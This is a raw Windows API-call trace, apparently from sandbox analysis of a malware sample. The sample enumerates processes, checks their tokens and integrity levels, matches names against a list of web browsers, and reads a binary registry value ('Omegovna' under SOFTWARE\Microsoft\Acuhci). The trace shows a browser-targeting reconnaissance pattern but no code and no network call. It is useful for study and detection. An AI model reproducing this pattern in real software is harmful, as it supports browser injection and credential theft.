0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0579.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0579.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0579.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0579.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0579.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0579.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0579.346] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0579.346] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0579.346] GetLastError () returned 0x7a [0579.346] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0579.346] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0579.346] CloseHandle (hObject=0x29c) returned 1 [0579.346] CloseHandle (hObject=0x298) returned 1 [0579.346] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0579.346] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0579.346] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0579.346] GetLastError () returned 0x7a [0579.346] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0579.346] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0579.346] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0579.346] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0579.346] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0579.346] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0579.346] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0579.346] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0579.346] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0579.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0579.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0579.346] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0579.346] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0579.346] GetLastError () returned 0x7a [0579.346] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0579.346] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0579.346] CloseHandle (hObject=0x29c) returned 1 [0579.346] CloseHandle (hObject=0x298) returned 1 [0579.347] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0579.347] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0579.347] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0579.347] GetLastError () returned 0x7a [0579.347] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0579.347] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0579.347] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0579.347] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0579.347] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0579.347] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0579.347] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0579.347] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0579.347] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0579.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0579.347] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0579.347] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0579.347] GetLastError () returned 0x7a [0579.347] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0579.347] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0579.347] CloseHandle (hObject=0x29c) returned 1 [0579.347] CloseHandle (hObject=0x298) returned 1 [0579.347] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0579.347] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0579.347] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0579.347] GetLastError () returned 0x7a [0579.347] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0579.347] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0579.347] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0579.347] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0579.347] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0579.347] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0579.347] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0579.347] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0579.347] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0579.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0579.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0579.347] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0579.348] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0579.348] GetLastError () returned 0x7a [0579.348] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0579.348] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0579.348] CloseHandle (hObject=0x29c) returned 1 [0579.348] CloseHandle (hObject=0x298) returned 1 [0579.348] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0579.348] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0579.348] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0579.348] GetLastError () returned 0x7a [0579.348] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0579.348] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0579.348] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0579.348] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0579.348] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0579.348] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0579.348] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0579.348] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0579.348] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0579.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0579.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0579.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0579.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0579.348] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0579.348] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0579.348] GetLastError () returned 0x7a [0579.348] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0579.348] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0579.348] CloseHandle (hObject=0x29c) returned 1 [0579.348] CloseHandle (hObject=0x298) returned 1 [0579.348] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0579.348] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0579.348] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0579.348] GetLastError () returned 0x7a [0579.348] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0579.348] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0579.349] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0579.349] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0579.349] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0579.349] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0579.349] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0579.349] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0579.349] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0579.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0579.349] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0579.349] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x20f788 | out: phkResult=0x20f788*=0x298) returned 0x0 [0579.349] RegQueryValueExW (in: hKey=0x298, lpValueName="Omegovna", lpReserved=0x0, lpType=0x20f7b4, lpData=0x0, lpcbData=0x20f79c*=0x0 | out: lpType=0x20f7b4*=0x3, lpData=0x0, lpcbData=0x20f79c*=0x6f0) returned 0x0 [0579.349] RegQueryValueExW (in: hKey=0x298, lpValueName="Omegovna", lpReserved=0x0, lpType=0x20f7b4, lpData=0x4124b8, lpcbData=0x20f79c*=0x6f0 | out: lpType=0x20f7b4*=0x3, lpData=0x4124b8*, lpcbData=0x20f79c*=0x6f0) returned 0x0 [0579.349] RegCloseKey (hKey=0x298) returned 0x0 [0581.462] OpenProcessToken (in: ProcessHandle=0x5d8, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5a4) returned 1 [0581.462] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0581.462] GetLastError () returned 0x7a [0581.462] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0581.462] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0581.462] CloseHandle (hObject=0x5a4) returned 1 [0581.462] CloseHandle (hObject=0x5d8) returned 1 [0581.462] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0581.462] OpenProcessToken (in: ProcessHandle=0x5d8, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5a4) returned 1 [0581.462] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0581.462] GetLastError () returned 0x7a [0581.462] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0581.462] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0581.462] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0581.462] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0581.462] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0581.462] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0581.462] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0581.462] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0581.462] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0581.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0581.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5d8 [0581.462] OpenProcessToken (in: ProcessHandle=0x5d8, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5a4) returned 1 [0581.462] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0581.462] GetLastError () returned 0x7a [0581.462] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0581.462] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0581.462] CloseHandle (hObject=0x5a4) returned 1 [0581.462] CloseHandle (hObject=0x5d8) returned 1 [0581.463] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0581.463] OpenProcessToken (in: ProcessHandle=0x5d8, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5a4) returned 1 [0581.463] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0581.463] GetLastError () returned 0x7a [0581.463] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0581.463] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0581.463] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0581.463] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0581.463] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0581.463] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0581.463] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0581.463] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0581.463] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0581.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5d8 [0581.463] OpenProcessToken (in: ProcessHandle=0x5d8, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5a4) returned 1 [0581.463] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0581.463] GetLastError () returned 0x7a [0581.463] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0581.463] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0581.463] CloseHandle (hObject=0x5a4) returned 1 [0581.463] CloseHandle (hObject=0x5d8) returned 1 [0581.463] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0581.463] OpenProcessToken (in: ProcessHandle=0x5d8, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5a4) returned 1 [0581.463] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0581.463] GetLastError () returned 0x7a [0581.463] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0581.463] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0581.463] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0581.463] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0581.463] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0581.463] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0581.463] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0581.463] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0581.463] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0581.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0581.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5d8 [0581.463] OpenProcessToken (in: ProcessHandle=0x5d8, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5a4) returned 1 